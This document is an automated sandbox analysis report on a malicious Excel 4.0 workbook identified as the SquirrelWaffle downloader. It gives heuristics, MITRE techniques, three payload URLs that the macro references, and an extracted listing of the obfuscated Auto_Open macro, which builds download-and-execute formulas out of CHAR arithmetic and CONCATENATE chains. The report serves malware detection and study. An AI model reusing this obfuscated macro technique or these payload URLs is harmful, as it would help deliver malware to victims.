Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
The sample is an Excel 4.0 spreadsheet containing an Auto_Open macro, which is a critical indicator of malicious intent. The macro utilizes ShellExecute and dangerous formula APIs, consistent with downloading and executing a second-stage payload. ClamAV detection confirms this, identifying it as Xls.Downloader.SquirrelWaffle. The embedded URLs are likely sources for this payload.
Heuristics (7)
- ClamAV: Xls.Downloader.SquirrelWaffle20921-9895790-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle20921-9895790-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array (3 URLs) (critical, OLE_XLM_CELL_ARRAY_URL): Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://cortinastelasytrazos.com/Yro6Atvj/sec.html (Referenced by macro)
  - https://orquideavallenata.com/4jmDb0s9sg/sec.html (Referenced by macro)
  - https://fundacionverdaderosheroes.com/gY0Op5Jkht/sec.html (Referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 9167 bytes |

SHA-256: 125eeb65449215b38b4c93bcf67effc9a2990373b692ed6d0729f78b6e651f74

Preview script: first 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - N
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - su
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - frm
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - frm.
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - frm..
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fev
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fte
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - ch
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - ci
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d frm.!E1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' su,D1,CHAR(200-86),""
' su,G2,CHAR(109-61),""
' su,K2,CHAR(190-91),""
' su,O2,CHAR(150-68),""
' su,C3,CHAR(200-99),""
' su,M3,CHAR(184-99),""
' su,H4,CHAR(200-133),""
' su,N4,CHAR(179-103),""
' su,B5,CHAR(200-125),""
' su,E5,CHAR(101-50),""
' su,J5,CHAR(250-134),""
' su,P5,CHAR(230-130),""
' su,F7,CHAR(100-50),""
' su,I7,CHAR(210-113),""
' su,L7,CHAR(220-109),""
' su,Q7,CHAR(157-88),""
' su,N8,CHAR(180-61),""
' su,A9,CHAR(201-91),""
' su,C9,CHAR(210-102),""
' su,H10,CHAR(140-72),""
' su,J10,CHAR(230-109),""
' su,P10,CHAR(186-102),""
' su,D11,CHAR(140-91),""
' su,L11,CHAR(192-100),""
' su,E12,CHAR(190-75),""
' su,I12,CHAR(220-115),""
' su,Q12,CHAR(190-70),""
' su,S12,CHAR(207-104),""
' su,B13,CHAR(101-36),""
' su,O13,CHAR(160-90),""
' su,K14,CHAR(145-99),""
' su,D15,CHAR(145-71),""
' su,G15,CHAR(210-93),""
' su,P15,CHAR(190-86),""
' su,T15,CHAR(197-85),""
' su,L16,CHAR(150-84),""
' su,E17,CHAR(230-172),""
' su,I17,CHAR(205-96),""
' su,Q17,CHAR(240-122),""
' su,N18,CHAR(150-67),""
' su,B19,CHAR(220-108),""
' su,J21,CHAR(108-55),""
' su,H32,_xlfn.ARABIC("CXI"),""
' su,D35,_xlfn.ARABIC("CI"),""
' su,K43,_xlfn.ARABIC("LXVII"),""
' ep,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' ep,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
' ep,D5,"CONCATENATE( Shee!S24, Shee!H4, Shee!D1, Shee!C3, Shee!I7, Shee!J5, Shee!C3,, Shee!H10, Shee!I12, Shee!D1, Shee!C3, Shee!K2, Shee!J5, Shee!L7, Shee!D1, Shee!J10, Shee!B13, Shee!S24, Shee!S25)",""
' ep,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
' ep,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' ep,H9,"CONCATENATE( Shee!S24, Shee!M3, Shee!O2,)",""
' ep,F10,"CONCATENATE( Shee!S24, Shee!D15, Shee!H4, Shee!D15, Shee!S24, Shee!S25)",""
' ep,O11,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!H4, Shee!D15, Shee!D15, Shee!S24, Shee!S25)",""
' ep,B13,"CONCATENATE( Shee!S24, Shee!B5, Shee!C3, Shee!D1, Shee!A9, Shee!C3, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' ep,H14,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!L16, Shee!L16, Shee!S24, Shee!S25)",""
' ep,F15,"CONCATENATE( Shee!S24, Shee!G15, Shee!D1, Shee!C9, Shee!I17, Shee!L7, Shee!A9, Shee!S24, Shee!S25)",""
' ep,D17,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!S24, Shee!S25)",""
' ep,B21,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!D11, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' ep,G24,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' ep,E28,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!F7, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' ep,I10,"CONCATENATE( Shee!N4, Shee!H10,)",""
' ep,I11,"CONCATENATE( Shee!L7, Shee!N8,)",""
' ep,H12,"CONCATENATE( Shee!A9, Shee!C9,)",""
' ep,J8,"CONCATENATE( Shee!L7, Shee!I7,)",""
' ep,I11,"CONCATENATE( Shee!P5, Shee!P10,)",""
' ep,N8,"CONCATENATE(, Shee!O13, Shee!I12, Shee!C9, Shee!S46)",""
' ep,I12,"CONCATENATE( Shee!B13, Shee!S24, Shee!S25)",""
' ep,F9,"CONCATENATE( Shee!G2, Shee!S25)",""
' frm,E8,"FORMULA( N!B13, su!H21)=FORMULA( N!D5, su!H22)=FORMULA( ep!D4, ep!E22)=FORMULA( N!F10, su!H23)=FORMULA( frm!G14, ep!I9)=FORMULA( N!D17, su!H24)=FORMULA( N!H9& ep!I10& ep!I11& ep!H12& ep!J8& ep!I11& ep!I9& ep!N8& ep!E22& fev!I12, su!H27)=FORMULA( Shee!G2, su!H25)=FORMULA( N!F15, su!H26)=FORMULA( frm..!F9, su!H29)=FORMULA( N!H14, su!H28)=FORMULA( N!G24, su!H31)=FORMULA( N!I2, su!H34)=FORMULA( N!L7, su!H35)=FORMULA( fte!G12, ch!C18)=FORMULA( N!O11, su!H36)=FORMULA( N!Q4, su!H38)=FORMULA( N!B21, su!H58)=FORMULA( N!S7, su!H39)=FORMULA( N!G24, su!H40)=FORMULA( N!E28, su!H60)=FORMULA( Shee!J21, su!H42)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H21& su!H22& su!H23& su!H24& su!H25& Shee!P37, frm.!E15)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H40& su!H29& su!H42& Shee!P37, frm.!E19)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I18& su!H31& su!H29& su!H25& Shee!P37, frm.!E17)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I19& su!H58& su!H29& su!H25& Shee!P37, frm.!E21)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H58& su!H29& su!H42& Shee!P37, frm.!E23)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I20& su!H60& su!H29& su!H25& Shee!P37, frm.!E25)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H60& su!H29& su!H42& Shee!P37, frm.!E27)",""
' frm..,D11,"FORMULA(CHAR(200-99), ep!I9)",""
' fev,G14,CHAR( Shee!H32),""
' fte,D4,CHAR( Shee!D35),""
' ci,G12,CHAR( Shee!K43),""